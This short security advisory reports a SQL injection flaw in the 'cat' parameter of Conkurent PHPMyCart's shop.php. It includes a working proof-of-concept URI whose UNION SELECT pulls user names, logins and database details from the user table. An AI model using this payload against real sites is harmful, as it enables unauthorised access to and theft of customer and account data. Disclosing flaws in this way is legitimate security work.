Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability

Conkurent PHPMyCart 'shop.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user